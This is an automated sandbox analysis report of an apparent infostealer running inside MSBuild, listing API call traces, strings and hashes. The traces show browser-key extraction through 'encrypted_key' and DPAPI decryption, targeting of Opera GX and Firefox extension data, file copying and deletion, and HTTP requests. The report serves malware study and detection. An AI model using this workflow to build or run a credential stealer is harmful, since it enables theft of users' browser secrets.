Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00417775,004366D6), ref: 004105CA
Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

CopyFileA.KERNEL32(?,?,00000001), ref: 0040B3AC
lstrlenA.KERNEL32(?), ref: 0040B4FE
lstrlenA.KERNEL32(?), ref: 0040B519
DeleteFileA.KERNEL32(?), ref: 0040B56B

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 38dd116929dd2f53acbb98a138f0bd9bcf65fae18724f488c39594e073ddec71
Instruction ID: 83e51ed13b6b7b0808c67653aa2717b405fc8e3f61057255e72c04a4a6184a74
Opcode Fuzzy Hash: 38dd116929dd2f53acbb98a138f0bd9bcf65fae18724f488c39594e073ddec71
Instruction Fuzzy Hash: 95714E72A00119ABCF01FFA5ED469CD7B75EF04309F105036F500B71A2DBB9AE898B98

Function 0040D3E3 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004177AD), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E72B,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E72B,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E72B,?,?,?), ref: 00408034

Part of subcall function 00411DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416973,?), ref: 00411E0C

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00417775,004366D6), ref: 004105CA
Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4

StrStrA.SHLWAPI(00000000,?,00437530,0043687B), ref: 0040D474
lstrlenA.KERNEL32(?), ref: 0040D487

Strings

^userContextId=4294967295, xrefs: 0040D4AC
moz-extension+++, xrefs: 0040D4B2

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 161838763-3310892237
Opcode ID: 46cc2b7afafce7ee4db082a7616715bfea9596386f41d53f59f5a6b26b446c1c
Instruction ID: f585363b1073d73c679416fbfda7f8be5c0209c100797f23621ef1c9dee4fcd8
Opcode Fuzzy Hash: 46cc2b7afafce7ee4db082a7616715bfea9596386f41d53f59f5a6b26b446c1c
Instruction Fuzzy Hash: DE410A72A0011D9BCF11FFA6DE465CD77B4AF04308F51402AFD44B3192DABCAE898B99

Function 0040819F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E72B,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E72B,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E72B,?,?,?), ref: 00408034

Part of subcall function 00411DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416973,?), ref: 00411E0C

StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC65,?,?), ref: 004081E5

Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB6A,?,?,?,?,?,?,?,0040CC65,?,?), ref: 004080D8
Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB6A,?,?,0040823B,0040CB6A,?,?,?,?,?,?,?,0040CC65,?,?), ref: 004080FD

Strings

DPAPI, xrefs: 0040821B
"encrypted_key":", xrefs: 004081DF
, xrefs: 00408241

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2311102621-738592651
Opcode ID: b2f15230854168149b27dc2e6c9b7e9634cbfe3a6f8565cc710715c7295cd128
Instruction ID: 5d652ddacd3f0cc8d6f159dd16f681150e23373ddb7d5df4fae2268399efbaa7
Opcode Fuzzy Hash: b2f15230854168149b27dc2e6c9b7e9634cbfe3a6f8565cc710715c7295cd128
Instruction Fuzzy Hash: B921C532E4020AABDF10EB91DD41ADE7774AF41364F1045BEE950B72D0DF38AA49CA58

Function 00416880 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004177AD), ref: 0041050D

Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC

StrCmpCA.SHLWAPI(?,ERROR), ref: 004168B5

Strings

ERROR, xrefs: 004168D8
ERROR, xrefs: 004168AD

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
String ID: ERROR$ERROR
API String ID: 3086566538-2579291623
Opcode ID: e777ab08267f5438d77e9bcaa8bba5d0d0afddbddd4b502180d01e9cd515e25a
Instruction ID: 1a3e91f55c678a087270c1db5f2d4501272bbb0eab73d9e6b4d818c4bfe9c2ae
Opcode Fuzzy Hash: e777ab08267f5438d77e9bcaa8bba5d0d0afddbddd4b502180d01e9cd515e25a
Instruction Fuzzy Hash: 24017C71A002189BCB20BB76D9869CD73A85F04304F114167BD14E3292D6BCE9898699

Function 00417023 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8,?,?), ref: 0041708A
CreateThread.KERNEL32(00000000,00000000,00416F52,?,00000000,00000000), ref: 004170C2
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 004170CA

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleSleepThreadWait
String ID:
API String ID: 4198075804-0
Opcode ID: 628ad50e888bd4c818e95c82b3ac43770484b66c2b54e0ab5912ba6519e5501a
Instruction ID: 6bd45489ef821003de90dc2f5bb34957d6f50c0db572c14d7fe8e5e48d4aab3a
Opcode Fuzzy Hash: 628ad50e888bd4c818e95c82b3ac43770484b66c2b54e0ab5912ba6519e5501a
Instruction Fuzzy Hash: 60214A72900219ABCF10EF55EC859DE7BB9FF44354F10412AF905A3251C779AA86CB98

Function 0041241B Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414ACD), ref: 00412435
WriteFile.KERNEL32(00000000,00000000,00414ACD,00414ACD,00000000,?,?,?,00414ACD), ref: 0041245C
CloseHandle.KERNEL32(00000000,?,?,?,00414ACD), ref: 00412473

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 8290f85b62bd7e33c2dcfbbc85231208eefcb9fd4bad64c91e3f3f76ae6d28f9
Instruction ID: 4f26f4eda66c6aca4eaf9ff0ad07a1db09bb9ffa41640e3e93edbc8a46cc3130
Opcode Fuzzy Hash: 8290f85b62bd7e33c2dcfbbc85231208eefcb9fd4bad64c91e3f3f76ae6d28f9
Instruction Fuzzy Hash: 6CF02471200108BFEF01AF64DD86EEB3B5CEF05398F001122F941D61A0D3A58F515BA9

Function 6C9D3060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C9D3095

Part of subcall function 6C9D35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6CA5F688,00001000), ref: 6C9D35D5
Part of subcall function 6C9D35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C9D35E0
Part of subcall function 6C9D35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C9D35FD
Part of subcall function 6C9D35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C9D363F
Part of subcall function 6C9D35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C9D369F
Part of subcall function 6C9D35A0: __aulldiv.LIBCMT ref: 6C9D36E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C9D309F

Part of subcall function 6C9F5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C9F56EE,?,00000001), ref: 6C9F5B85
Part of subcall function 6C9F5B50: EnterCriticalSection.KERNEL32(6CA5F688,?,?,?,6C9F56EE,?,00000001), ref: 6C9F5B90
Part of subcall function 6C9F5B50: LeaveCriticalSection.KERNEL32(6CA5F688,?,?,?,6C9F56EE,?,00000001), ref: 6C9F5BD8
Part of subcall function 6C9F5B50: GetTickCount64.KERNEL32 ref: 6C9F5BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C9D30BE

Part of subcall function 6C9D30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C9D3127
Part of subcall function 6C9D30F0: __aulldiv.LIBCMT ref: 6C9D3140

Part of subcall function 6CA0AB2A: __onexit.LIBCMT ref: 6CA0AB30

Memory Dump Source

Source File: 00000002.00000002.2562751473.000000006C9D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000002.00000002.2562669428.000000006C9D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2563025623.000000006CA4D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2563101852.000000006CA5E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2563152283.000000006CA62000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9d0000_MSBuild.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 2da9d94da8d8dac0a1bbcbc896852145fa040d10e6635aadf2b0da912f0b5662
Instruction ID: 38d18698e87c1a96a0dfedbe4ff9f3288346df6bc581c2e35740da09beb907ae
Opcode Fuzzy Hash: 2da9d94da8d8dac0a1bbcbc896852145fa040d10e6635aadf2b0da912f0b5662
Instruction Fuzzy Hash: 56F0F922E20BC996CB14DF349D811E67370AF7B118F91D31DE85963991FB30A1D98382

Function 00410C5A Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C66
HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C6D
GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410C81

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 6c13bdc48f24620c1458262451df69a1fa4e50b82ce9a072ad0b58c7c76c57f0
Instruction ID: f6aeb2de1523635185e516c3bea9f441b1e125238e9ebec13057e88de697580f
Opcode Fuzzy Hash: 6c13bdc48f24620c1458262451df69a1fa4e50b82ce9a072ad0b58c7c76c57f0
Instruction Fuzzy Hash: 49E08CB1200204BBD7448B99AC8DF8E7BBCDB84711F000235F605D2250E6B4C9848B68

Function 0040C931 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON

Download Yara Rule

APIs

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

StrCmpCA.SHLWAPI(?,Opera GX,0043684E,0043684B,?,?,?), ref: 0040C964

Part of subcall function 00411D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DD2

Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00417775,004366D6), ref: 004105CA
Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004177AD), ref: 0041050D

Part of subcall function 00411D67: GetFileAttributesA.KERNEL32(?,?,?,0040DA54,?,?,?), ref: 00411D6E

Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC65,?,?), ref: 004081E5

Strings

Opera GX, xrefs: 0040C954

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
String ID: Opera GX
API String ID: 1719890681-3280151751
Opcode ID: 335a2392ef4f7dbaf7e43c7b2dc912d7aed0ca2d822cc28f9d0630ff2ef11c1b
Instruction ID: 763ddcdae33350dc8d5d809906e0fe4b06c038e7bbc47a4f49a053b12efcf3f0
Opcode Fuzzy Hash: 335a2392ef4f7dbaf7e43c7b2dc912d7aed0ca2d822cc28f9d0630ff2ef11c1b
Instruction Fuzzy Hash: 52B1E032D0011DABCF11FBA5DE836DD7775AF04308F51413AF90477192DAB8AE8A8B99

Function 00407B0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A

Strings

, xrefs: 00407B5D

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: 1e0293ad7fe1b410e6cab7663ead9d675dd73926159e09c2aa2d39085b7e9cd6
Instruction ID: 8b34d31359cbfb98b728bace79fec1a9097574c66fcc9e6a4a6ac37e45fc102e
Opcode Fuzzy Hash: 1e0293ad7fe1b410e6cab7663ead9d675dd73926159e09c2aa2d39085b7e9cd6
Instruction Fuzzy Hash: EA119D71908509ABDB20DF94C684BAAB3F4FB00348F144466D641E32C0D33CBE85D75B

Function 00416372 Relevance: 3.1, APIs: 2, Instructions: 101stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00411D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DD2

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 004163BA
lstrcatA.KERNEL32(?), ref: 004163D8

Part of subcall function 00416013: wsprintfA.USER32 ref: 0041605A
Part of subcall function 00416013: FindFirstFileA.KERNEL32(?,?), ref: 00416071
Part of subcall function 00416013: StrCmpCA.SHLWAPI(?,00436ABC), ref: 00416092
Part of subcall function 00416013: StrCmpCA.SHLWAPI(?,00436AC0), ref: 004160AC
Part of subcall function 00416013: wsprintfA.USER32 ref: 004160D3
Part of subcall function 00416013: StrCmpCA.SHLWAPI(?,00436647), ref: 004160E7
Part of subcall function 00416013: wsprintfA.USER32 ref: 00416104
Part of subcall function 00416013: PathMatchSpecA.SHLWAPI(?,?), ref: 00416131
Part of subcall function 00416013: lstrcatA.KERNEL32(?), ref: 00416167
Part of subcall function 00416013: lstrcatA.KERNEL32(?,00436AD8), ref: 00416179
Part of subcall function 00416013: lstrcatA.KERNEL32(?,?), ref: 0041618C
Part of subcall function 00416013: lstrcatA.KERNEL32(?,00436ADC), ref: 0041619E
Part of subcall function 00416013: lstrcatA.KERNEL32(?,?), ref: 004161B2

Part of subcall function 00416013: wsprintfA.USER32 ref: 0041611B
Part of subcall function 00416013: CopyFileA.KERNEL32(?,?,00000001), ref: 0041626B
Part of subcall function 00416013: DeleteFileA.KERNEL32(?), ref: 004162DF
Part of subcall function 00416013: FindNextFileA.KERNEL32(?,?), ref: 00416341
Part of subcall function 00416013: FindClose.KERNEL32(?), ref: 00416355

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
